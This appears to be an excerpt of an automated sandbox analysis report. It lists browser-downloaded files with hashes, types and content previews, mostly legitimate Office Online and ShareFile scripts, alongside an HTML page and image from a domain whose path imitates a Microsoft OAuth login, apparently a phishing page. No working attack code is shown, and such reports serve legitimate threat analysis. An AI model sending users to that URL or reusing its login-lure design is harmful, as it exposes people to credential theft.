                                                                    Preview:.dialog{--dialog-bg-color:#fff;--dialog-border-color:#fff;--dialog-shadow:0 2px 14px 0 rgba(58,57,68,.2);--text-primary-color:#15141a;--text-secondary-color:#5b5b66;--hover-filter:brightness(0.9);--focus-ring-color:#0060df;--focus-ring-outline:2px solid var(--focus-ring-color);--link-fg-color:#0060df;--link-hover-fg-color:#0250bb;--separator-color:#f0f0f4;--textarea-border-color:#8f8f9d;--textarea-bg-color:#fff;--textarea-fg-color:var(--text-secondary-color);--radio-bg-color:#f0f0f4;--radio-checked-bg-color:#fbfbfe;--radio-border-color:#8f8f9d;--radio-checked-border-color:#0060df;--button-secondary-bg-color:#f0f0f4;--button-secondary-fg-color:var(--text-primary-color);--button-secondary-border-color:var(--button-secondary-bg-color);--button-secondary-hover-bg-color:var(--button-secondary-bg-color);--button-secondary-hover-fg-color:var(--button-secondary-fg-color);--button-secondary-hover-border-color:var(--button-secondary-hover-bg-color);--button-primary-bg-color:#0060df;--button-prim
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (60818)
                                                                    Category:dropped
                                                                    Size (bytes):2847459
                                                                    Entropy (8bit):5.365166028993656
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:97E2C8F1C21FCBC80C626462253A06C8
                                                                    SHA1:FAC28B5A180F6723DD35F99333641AB5FEEDC5E4
                                                                    SHA-256:B5231CB1C45930D016960A87F3CFF2F9C2F6601B33143992561DDEB1E5BA1C9B
                                                                    SHA-512:71A3D31991DB31E40E2338AA3503933ECA79A7914D7A04367E093E5C85E79BED76C770663E02920E88C68527511E19C4F9F0AA71101BBD2CA44E37084DFB0386
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:var _globalThis,_dullscriptWebpackJsonp;(_globalThis=globalThis)[_dullscriptWebpackJsonp="dullscriptWebpackJsonp"]||(_globalThis[_dullscriptWebpackJsonp]=[]),globalThis.qwtManifest_WordViewerDS={...globalThis.qwtManifest_WordViewerDS,0:"WordViewerDS.js",1:"WordViewerDS.dll1.js",2:"WordViewerDS.immersive-reader-sdk.js",3:"WordViewerDS.objectmodel.js"},globalThis.dullscriptWebpackJsonp.push=function(e){return function(...t){const n=e.apply(this,t),a=t[0]?.[0]?.[0],i=a&&globalThis.qwtManifest_WordViewerDS[a];return i&&window.dispatchEvent(new CustomEvent("qwt_onChunkLoaded",{detail:{fileName:i}})),n}}(globalThis.dullscriptWebpackJsonp.push),function(){var __webpack_modules__={7156:function(e,t,n){"use strict";function a(e,t,n){return s(e,1,t,n)}function i(e,t,n){return s(e,2,t,n)}function o(e,t,n){return s(e,3,t,n)}function r(e,t,n){return s(e,0,t,n)}function s(e,t,n,a){return{name:e,dataType:t,value:n,classification:a||4}}n.d(t,{a:function(){return a},b:function(){return o},c:function(){
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (64966), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):344513
                                                                    Entropy (8bit):6.031944866649514
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B5E7A5CDFB9030AF0FE2499430067679
                                                                    SHA1:9819DEA0E938657F86589635976CD1823B5B1643
                                                                    SHA-256:E1CC32825BA55B8EAD99361598ADA5E5ED87C49C25C7FE972A7DA3F3025A9955
                                                                    SHA-512:550D41B7FA57E72CAC23439BBE03C454AFCA3D17761E759282F339F55C176EACD35A3D3F534FBB34292E7A43234248F6DC3FD11A1A38B8BD6CA3617C96C51BC3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/aspx.htm
                                                                    Preview:..<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>****---***</title>.. <style>.. body {.. font-family: "Segoe UI", "Segoe UI Web (West European)", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;.. background-color: #f4f4f4;.. margin: 0;.. display: flex;.. justify-content: center;.. align-items: center;.. height: 100vh;.. color: #333;.. background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABioAAALkCAYAAACRC231AAAgAElEQVR4Xuy9S8ttzbImdNa3T/0WL4ggNgQbNuzYsWPHI0qBKIJYIGhDBBvasKEdQbCj5aVU1EIoCrRQERVRwQIvUKKoICL+Dc/e25kZ8UQ8T2RkjjHnu9ba33rXfPf+1hwjR17iHpER4/Llr/t7//zv/+jw92Vcm//kQTnNy6Prl7g6x9GZz7A2Sp864ATc6VqDVYdot7a17fEwFL9YD+9mx972Ksw+bsLp/+SxNz0u/J4Q4es2/HEd6584q+gJf3fg08xYylf0UwJmhdGAEZAeJ3sQl9USrKPEfpD4u+HM5yofxvr4y0OT9UUHitCpjjUAT
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 41268, version 1.0
                                                                    Category:downloaded
                                                                    Size (bytes):41268
                                                                    Entropy (8bit):7.995563635685618
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:B9EB4972777F0182FE841BBC280E5CDE
                                                                    SHA1:EDC69B1AA4B56048EA6B5C0217DABE8144036E25
                                                                    SHA-256:D37AB938D33FE41FEC69CC38C301A5AB7CB5AB928DBA29D9E9407582E08D3D24
                                                                    SHA-512:9575EC043889C64BF8B6C2055BDC6EAB943F0626BFAADE0A11006D5409DC2B4681AE4E789F5D3B06CB0DC047AE4A9F03CBE1EB80349D53ED24316D84F34A991C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.51.0/package/dist/d8fcf3851ba79b1d138a.woff2
                                                                    Preview:wOF2.......4.......H....................................\.`..D.`........d.. .6.$..T..,.. ..2..;..=[....U...O*c@...~.8..3.dn.~..6:.......V}..........nR.C..i..]....C..F.....jA.....*.S.....*..K..Q.B.5w.P...4...~..T-A......[.Z.h...8-O-...2.%3...y.\d..A.0.Go..s..........\.GX..a...V....\.pK...t.5P......)Y2.cC..~..Z....V..!v..%.."....7.Ut..qgA..5..sJ...|...4....Y)......+9.!...,...Y.=W9..p<.........?.i..88..p..].G....c.$J.Y..z...'.h.g..sy.....9=..oq..!...P...L.[.....G..:.ss(..T.1.W.U.l.........Qmb....,.o...G...{o..?...o.;.#f....[".... ..H.4..xx.{w...*.5..,/!.L.i.#.DZZ...HK.%N..Om...B.$....a..#mj.Y....|.F{......HV..e/S.Z.#...j..l.....b].....eX/!<....f,vf..;........1wG|..6.L.}.!.!.$..5.{r..a.|. ........W...._*.'..L.4Dd3..Z.........l..t..b..%.?K>......\T.Mx...d.&A...Q....]uer.........xq.%l......h8m.*.......E.%|..?.Y...\....A[4f1.S...Z.)..e.!.$.....Ki.N.P.m.Ccl..j..;.... .?.qJ..\..<...^@..H..9klj..m.........@.......VoD\.^&0.3...5+#..N;.R.%...W#..S2.[..@.l.1!$
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (55320)
                                                                    Category:downloaded
                                                                    Size (bytes):55384
                                                                    Entropy (8bit):5.402007343018523
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D7FA53958E5BA828FEBE01A45075469E
                                                                    SHA1:1AE6A7607029209F55A13F68B5CFDF1CCA95082B
                                                                    SHA-256:44C772C0BDD957C95564D589FA388D7622B0CF17C20B2CAF21760E4FC66E0DC4
                                                                    SHA-512:25462206E25766922831E0A667FF295F063E202EFE4B21271059CEC70F50AE241B9F205D58EAAE0CF6BAE3832B4D54154BD8695CD91B40ECD7EF4CD92187EA60
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevreviewapprovalpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var r={},n={},a={},o={},i={},c={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){r.AccountsEntity=e.AccountsEntity,r.ContactListType=e.ContactListType,r.ContactsEntity=e.ContactsEntity,r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Checkbox=e.Checkbox,a.Col=e.Col,a.DatePicker=e.DatePicker,a.Divider=e.Divider,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Modal=e.Modal,a.Row=e.Row,a.Select=e.Select,a.Space=e.Space,a.Spin=e.Spin,a.Steps=e.Steps,a.Tabs=e.Tabs,a.Tag=e.Tag,a.Tooltip=e.Tooltip,a.Typography=e.Typography,a.them
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65466)
                                                                    Category:dropped
                                                                    Size (bytes):2909848
                                                                    Entropy (8bit):5.5215160653337865
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AB1D7A85821E4ED38E38F0750E160735
                                                                    SHA1:A77AE17AFDC6CCFCD62F0CF105838C7A15070B99
                                                                    SHA-256:2ADC5792916E73CB81E4C81EE739CBB3890FBE59F283302589EB29AB073E36A8
                                                                    SHA-512:30437891947DBFEC97B80D8B7DEBA30F274D9D99D102545E5BBF2D8C33AE01C4FC338E4F62404A0CD92EA550203686811CC061F86CB4FF21C3D7959FA15408A2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:/*! For license information please see common50.min.js.LICENSE.txt */.function _check_private_redeclaration(e,t){if(t.has(e))throw new TypeError("Cannot initialize the same private elements twice on an object")}function _class_apply_descriptor_get(e,t){return t.get?t.get.call(e):t.value}function _class_apply_descriptor_set(e,t,n){if(t.set)t.set.call(e,n);else{if(!t.writable)throw new TypeError("attempted to set read only private field");t.value=n}}function _class_apply_descriptor_update(e,t){if(t.set){if(!t.get)throw new TypeError("attempted to read set only private field");return"__destrWrapper"in t||(t.__destrWrapper={set value(n){t.set.call(e,n)},get value(){return t.get.call(e)}}),t.__destrWrapper}if(!t.writable)throw new TypeError("attempted to set read only private field");return t}function _class_check_private_static_field_descriptor(e,t){if(void 0===e)throw new TypeError("attempted to "+t+" private static field before its declaration")}function _class_extract_field_descriptor(e
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (11651), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):11651
                                                                    Entropy (8bit):5.434902079728848
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:041ABD9EF463F6F7518D81C9576EAFFC
                                                                    SHA1:127D2CFFF673C7A5CACB389092A86B7ED3856054
                                                                    SHA-256:59E071558BBDE0515138C84B087DE0F795032F1724E23C2261CEC72AF38D96D1
                                                                    SHA-512:B5A2EB9D1C4654917F8C1B2619B16146C7B1E399D815FE419C6E1B9E082C4AF264E869909F8935EB1DD2A160CAD78022AD9D43D39440F161B6FDDC228EE87DD1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/versioned/suiteux-shell/4.0.73/js/suiteux.shell.consappdata.js
                                                                    Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_consappdata_start"),(self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]=self["suiteux_shell_webpackJsonp_suiteux-bootstrapper"]||[]).push([["consappdata"],{9227:function(e,o,t){t.r(o),t.d(o,{loadConsumerAppData:function(){return _}});var l=t(6968);const n="auth=1";function s(e,o,t,l,s,r){const i=encodeURIComponent(o),a=s?encodeURIComponent(s):"",h=s?"login_hint="+a:void 0,m="https://www.microsoft365.com",u="https://outlook.com";let p=h?u+"?"+h:u;const f="https://outlook.live.com/calendar/";let d=h?f+"?"+h:f;const S="https://onedrive.live.com";let g=h?S+"?"+h:S;const w=m+"/launch/word?"+["username="+i,n].join("&");let C=h?w+"&"+h:w;const _=m+"/launch/excel?"+["username="+i,n].join("&");let O=h?_+"&"+h:_;const P=m+"/launch/powerpoint?"+["username="+i,n].join("&");let E=h?P+"&"+h:P;let y="https:/
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (32010)
                                                                    Category:dropped
                                                                    Size (bytes):50049
                                                                    Entropy (8bit):5.315307632257224
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:63E2DF852D15AB21D7FF8FC4363222E8
                                                                    SHA1:7EE401BA652DB0A4EC960350E17216CDA01E22FB
                                                                    SHA-256:545156ADEAE44DADC82B98D504F805EBE77FB79C928EF34EED1057BB9D4CB8FE
                                                                    SHA-512:BAAD17C762461527B270B57EF294E28BEFF92B3A66829B8DDD8788A791AEBB0A40BE849BFC79FCFC5CB0D7FFC7FD709CA6CD6A61CAC878CE60F585D40F214970
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(46);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 252 x 252, 8-bit/color RGBA, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):57933
                                                                    Entropy (8bit):7.9890447324694485
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D63CF4BABEB0DD8F367CC8187320A3BE
                                                                    SHA1:44856BFD987087066AABB8798917E134F14EEAF2
                                                                    SHA-256:EE87AB3A547A3534D2BD1C005F0FEA9B58F298ED5B4234BD3AFB0619A585EDE0
                                                                    SHA-512:A781D8ECAB1D68418BABF3FAB75ABC1B6DB43DEB854D13936AB50A484EBBF6DAB6D8EF6DD9A8604CDE9E944F4EDF2D2E948D1DF3E67130825D34434941422E5C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://victoryacademytc.com/common_oauth2_v20_authorizeclientid_4765445b32c649b0/173161685056095955.png
                                                                    Preview:.PNG........IHDR.............S..g... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......tIME.....+.++......IDATx...y.eIV.~WD....9VVefuuUO.-..4..E.D....`3....P....|UT........"W.e.....vs....+3+..y....u..........U.UME~N.s.}...k....^./..y..1..F)7.."r*J<.B8.B8.c<mb8%.q+l..A.F...........\S#WD.\..Vx...F...e..!".K..%.n..W..........z..3..@.}Q..Py.Q.60..q.Y..)....U.k.. F..D...A....FAD..A.}5......8D.5...../...Uc.;1.7.O.u.....x...+........?..V.;.y............I75..t..u.h.F..E5.F..S..MB..6..........B...!..W.H.|..K~\"DE5.*..'4..z:yO..3..._.w...2^...:...S].Z? ..TSV_X...i.. B...!.bQ......L.U..4..T@#....$..$o..`...@L........d.t..YU.....H..P..........Zk....G?..........xE._.......W[~z@."x>eX....... ..j,....Y...^4.~.D.X.P.N.T.....$..}..wx......T..t..o1.k.AU..QU.. .""8.%.......4u.K........s.o...._...".W..........[..|1..km.F..M....x.Z\Q`..k-.!h..oAM....I.....)B@%....,.Q....]z...^...K........{A..,.>..U.P'...d...i..c.V(J.1..B.a."....e.}........w..}..W.....?./
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65514), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):691489
                                                                    Entropy (8bit):5.0118881740047705
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C2203B39A99DC52CE64A75CC20878C0B
                                                                    SHA1:55910314351A6D5ED8651B895292F93FE8F375AF
                                                                    SHA-256:F536EFA502D9446F902D6B94C611E178F3381E3E06897C03B1174BD88774EBFC
                                                                    SHA-512:FD023D3570DC539791B302254A7E770FF8B756F7D563A3054EE6D9892CB3290ECCD85C2876B8AB42165CEED6CEAF291403C758857725DE228D465C030B68ECD1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://res-1.cdn.office.net/officeonline/hashed/f536efa502d9446f/word-app-intl.min.js
                                                                    Preview:"use strict";var WordRibbonStrings={About:"About",AboutFollowUps:"about Follow-ups",AboutFollowUpsLearnMore:"Learn more",AboutKeytip:"D",Above:"Above",AcceptAllChanges:"Accept All Changes",AcceptAllChangesKeytip:"B",AcceptChange:"Accept",AcceptChangeKeytip:"A2",AcceptChangeAndMoveToNext:"Accept and Move to Next",AcceptChangeAndMoveToNextKeytip:"A",Accessibility:"Accessibility",AccessibilityHelp:"Accessibility Help (Alt+Shift+A)",AccessibilityHelpDescription:"Find out about accessibility features in Word Online.",AccessibilityHelpKeytip:"A",AccessibilityMode:"Accessibility Mode",AccessibilityTab:"Accessibility",AccessibilityTabKeyTip:"A",AppHomeButtonAriaLabel:"Word, click to open Word home page",AppHomeButtonTooltip:"Word home",Citation:"Citations",CitationAndBibliography:"Citation & Bibliography",CitationKeytip:"C",Activity:"Edit Activity",ActivityContextMenuLabel:"Show new changes",AdaptiveGroupTitle:"Current Selection",AddCentreTabStop:"Add centre tab stop",AddInsKeytipPrefix:"Y",Ad
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65479)
                                                                    Category:downloaded
                                                                    Size (bytes):225201
                                                                    Entropy (8bit):5.408388153730654
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:64F99D849668A847C87EA04D242E95A2
                                                                    SHA1:4A4D823553A444BAB88140440B1D09A3E29A4F4D
                                                                    SHA-256:48956962760EEE029722B4AD7BE951CD2BFEDCFA17C096A0D5A9A724E1BF8CDC
                                                                    SHA-512:BC0BB48087014D9795268085B601A1E2A447D4A5BE8159CC77C55234B0D03D4083565E815DC9DB02A808C36C9C4654518DB28931A1076C919C93AB27D39765EB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.38.1/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.sizes=e.sizes},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))}],execute:function(){e((()=>{var e,s,u,c,l={84153:(e,t,r)=>{"use strict";r.d(t,{A:()=>fe});var n=r(58168),i=r(89379),o=r(64467),a=r(53986),s=r(54726),u=r(46942),c=r.n(u),l=r(82284),f=r(66351);var d=function(){for(var e=arguments.length,t=new Array(e),r=0;r<e;r++)t[r]=arguments[r];var n=t.filter
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):11
                                                                    Entropy (8bit):3.2776134368191165
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                    SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                    SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                    SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:Bad Request
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65453)
                                                                    Category:downloaded
                                                                    Size (bytes):91744
                                                                    Entropy (8bit):5.35315025267453
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EC10A08ABEEA396244C7C88FFAA5ECF7
                                                                    SHA1:29EA05BFC2B2A754AE77DF48FEBAC23A79352C48
                                                                    SHA-256:E4126A1DD61B9AB0EB21038540041710DDCBDCD5E03C0D7C302F74E25EF34B8E
                                                                    SHA-512:23B746B157D1DD8A2896FEDD3A86CDF13A755353FF7F9BB87A339CBE194B844B0EAEE32F038F73254BB355BEA29D02052496B28D0FB29EECA85B2CA29D343B1A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js
                                                                    Preview://@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{}).System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button=e.Button,r.Modal=e.Modal,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Tag=e.Tag},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o["default"]=e["default"],o.findDOMNode=e.findDOMNode,o.flushSync=e.flushSync},function(e){i.__awaiter=e.__awaiter,i.__rest=e.__rest}],execute:function(){e((()=>{var e,s,a={5916:(e,t,r)=>{"use strict";r.d(t,{XK:()=>C,jK:()=>x});var n=r(8830),o=r.n(n),i=r(4193),s=undefined&&undefined.__assign||function(){return s=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},s.apply(this,arguments)};function a(e){return Promise.resolve(o()({method:e.method,url:e.url,withCredential
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):87
                                                                    Entropy (8bit):4.05298175485356
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:5151B02BBED24D56CBE862FE7462084D
                                                                    SHA1:6ACAB31C3D18D3E61309E8B46338CF8BC4D67EEC
                                                                    SHA-256:300735AC477BB7E09CE2725F0031B085E5C86F09903D053AC8E44596731D8780
                                                                    SHA-512:BF09D8D9D0DFBE00FD38D3BEF695FA70CD9EB64BB629F475CB5BBF7889F866D1F9626DDBC84927020735F8FC0B4236206A7A5CA837368126D92C30ECDAED32C6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0,'log':0})
                                                                    No static file info